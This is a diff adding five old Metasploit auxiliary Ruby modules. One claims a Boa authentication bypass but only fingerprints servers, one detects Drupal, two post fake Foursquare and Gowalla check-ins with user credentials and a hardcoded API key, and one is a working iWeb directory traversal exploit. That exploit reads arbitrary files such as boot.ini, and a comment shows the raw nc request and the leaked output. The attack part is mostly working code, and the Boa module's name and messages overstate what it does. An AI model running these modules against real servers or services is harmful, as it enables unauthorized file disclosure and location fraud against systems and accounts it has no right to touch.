some old modules

modules/auxiliary/admin/boa_authbypass.rb

@@ -0,0 +1,65 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WMAPScanServer
+	# Scanner mixin should be near last
+	#include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        	=> 'Boa Authentication Bypass Exploit',
+			'Version'     	=> '$Revision: $',
+			'Description'	=> 'This module checks for your moms...',
+			'Author'        => ['CG'],
+			'License'	=> MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'URL', 'http://www.milw0rm.com/exploits/4542' ],
+					[ 'URL', 'http://www.securityfocus.com/archive/1/479434'],
+				]
+		)
+
+end
+
+	def run
+
+
+		begin
+			res = send_request_raw({
+				'version'	=> '1.1',
+				'uri'		=>  '/home/index.shtml',
+				'method'        => 'GET',	                        
+			}, 10)
+
+			if (res and res.headers['Server'])
+				if res.headers['Server'] =~ /Boa/
+					print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah")
+				elsif 
+					print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}")
+				end
+
+			else
+				''
+			end
+
+		end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+			puts e.message
+		end
+	end
+#end
+

modules/auxiliary/admin/drupalcheck.rb

@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::WMAPScanServer
+	# Scanner mixin should be near last
+	#include Msf::Auxiliary::Scanner
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        	=> 'Drupal Check',
+			'Version'     	=> '$Revision: $',
+			'Description'	=> 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value.  This should identify Drupal 4.6 and above.  You MUST set the VHOST to be the domain name for this to work.',
+			'Author'        => ['CG'],
+			'License'	=> MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ],
+				]
+		)
+
+		register_options(
+			[
+				OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
+				OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ])
+			], self.class)
+end
+
+	def run
+
+
+		begin
+			agent = datastore['UserAgent']
+			res = send_request_raw({
+				'version'	=> '1.0',
+				'uri'		=>  '/',					
+				'method'        => 'GET',
+				'headers'       =>
+	                       	{
+					'Accept'        => '*/*',
+					'Connection'    => 'Keep-Alive',
+				}	                        
+
+			}, 10)
+
+			if (res and res.headers['Expires'])
+				if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/
+					print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}")
+				elsif 
+					print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}")
+				end
+
+
+			else
+				''
+			end
+
+		end
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+			puts e.message
+		end
+	end
+#end
+

modules/auxiliary/admin/foursquare.rb

@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        	=> 'Foursquare Location Poster',
+			'Version'     	=> '$Revision:$',
+			'Description'	=> 'Fuck with Foursquare, be anywhere you want to be by venue id',
+			'Author'        => ['CG'],
+			'License'	=> MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+					[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+				]
+		)
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+		register_options(
+			[
+				Opt::RHOST('api.foursquare.com'),
+				OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France
+				OptString.new('USERNAME', [ true, 'foursquare username', 'username']),
+				OptString.new('PASSWORD', [ true, 'foursquare password', 'password']),
+			], self.class)
+
+	end
+
+	def run
+
+		begin
+			user = datastore['USERNAME']
+			pass = datastore['PASSWORD']
+			venid = datastore['VENUEID']
+			user_pass = Rex::Text.encode_base64(user + ":" + pass)
+			decode = Rex::Text.decode_base64(user_pass)
+			postrequest = "twitter=1\n" #add facebook=1 if you want facebook
+
+			print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+			print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+			res = send_request_cgi({
+				'uri'     => "/v1/checkin?vid=#{venid}",
+				'version'	=> "1.1",
+				'method'  => 'POST',
+				'data'   => postrequest,
+				'headers' =>
+					{
+						'Authorization' => "Basic #{user_pass}",
+						'Proxy-Connection' =>  "Keep-Alive",
+					}
+			}, 25)
+
+			print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE =>e
+			puts e.message
+	end
+end
+
+

modules/auxiliary/admin/gowalla.rb

@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        	=> 'Gowalla Location Poster',
+			'Version'     	=> '$Revision:$',
+			'Description'	=> 'Fuck with Gowalla, be anywhere you want to be by spot id',
+			'Author'        => ['CG'],
+			'License'	=> MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+					[ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+				]
+		)
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+		register_options(
+			[
+				Opt::RHOST('api.gowalla.com'),
+				OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']),
+				#OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']),
+				OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ
+				OptString.new('USERNAME', [ true, 'gowalla username', 'username']),
+				OptString.new('PASSWORD', [ true, 'gowalla password', 'password']),
+				OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']),
+				OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']),
+				OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']),
+				OptString.new('COMMENT', [ true, 'Comment', 'fooooood']),
+			], self.class)
+
+	end
+
+	def run
+
+		begin
+			user = datastore['USERNAME']
+			pass = datastore['PASSWORD']
+			spotid = datastore['SPOTID']
+			lng = datastore['GPSLONGITUDE']
+			lat = datastore['GPSLATITUDE']
+			api = datastore['GOWALLAAPIKEY']
+			comment = datastore['COMMENT']
+
+			user_pass = Rex::Text.encode_base64(user + ":" + pass)
+			decode = Rex::Text.decode_base64(user_pass)
+			postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n"
+
+			print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+			print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+			res = send_request_cgi({
+				'uri'     => "/checkins?spot_id=#{spotid}",
+				'version'	=> "1.1",
+				'method'  => 'POST',
+				'data'   => postrequest,
+				'headers' =>
+					{
+						'Authorization' => "Basic #{user_pass}",
+						'X-Gowalla-API-Version' => "1",
+						'Accept' => 'application/json',
+						'Proxy-Connection' =>  "Keep-Alive",
+						'X-Gowalla-API-Key' => "#{api}"
+					}
+			}, 25)
+
+			print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+			end
+
+		rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		rescue ::Timeout::Error, ::Errno::EPIPE =>e
+			puts e.message
+	end
+end
+
+

modules/auxiliary/admin/iweb_dir_traversal.rb

@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+	# Exploit mixins should be called first
+	include Msf::Exploit::Remote::HttpClient
+	# Scanner mixin should be near last
+	include Msf::Auxiliary::Report
+
+	def initialize
+		super(
+			'Name'        => 'iWeb HTTP Server Directory Transversal Vulnerability',
+			'Version'     => '$Revision:  $',
+			'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability',
+			# some webcam shit has a similar Server Header see below for actual server header. 
+			# default install path C:\Progam Files\Ashley Brown\iWeb\
+			'Author'      => 'CG' ,
+			'License'     => MSF_LICENSE,
+			'References'	=>
+				[
+					[ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ],
+					[ 'BID', '37228' ],
+					[ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ],
+					[ 'URL', 'http://www.exploit-db.com/exploits/10331' ]
+				]	
+		)		
+		register_options(
+			[
+				OptString.new('FILE', [ true,  "The file to view", 'boot.ini']),
+				OptString.new('TRAV', [ true,  "Traversal Depth", '..%5C..%5C..%5C']),
+			], self.class)
+	end
+
+	def run
+
+		begin	
+			file = datastore['FILE']
+			trav = datastore['TRAV']
+			res = send_request_raw({
+				'uri'          => '/'+trav+file, 
+				'method'       => 'GET'
+						}, 10)
+
+			if (res and res.code == 200)
+				print_status("Output Of Requested File:\n#{res.body}")
+			else
+				print_status("Received #{res.code} for #{trav}#{file}")
+			end
+
+		#rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+		#rescue ::Timeout::Error, ::Errno::EPIPE
+		end
+	end
+
+end
+
+# nc 172.16.10.132 80
+# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0
+
+# HTTP/1.1 200 OK
+# LastModified: 12/22/2005 3:22:59 PM
+# Server: iWeb
+# Content-Length: 210
+
+# [boot loader]
+# timeout=30
+# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+# [operating systems]
+# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect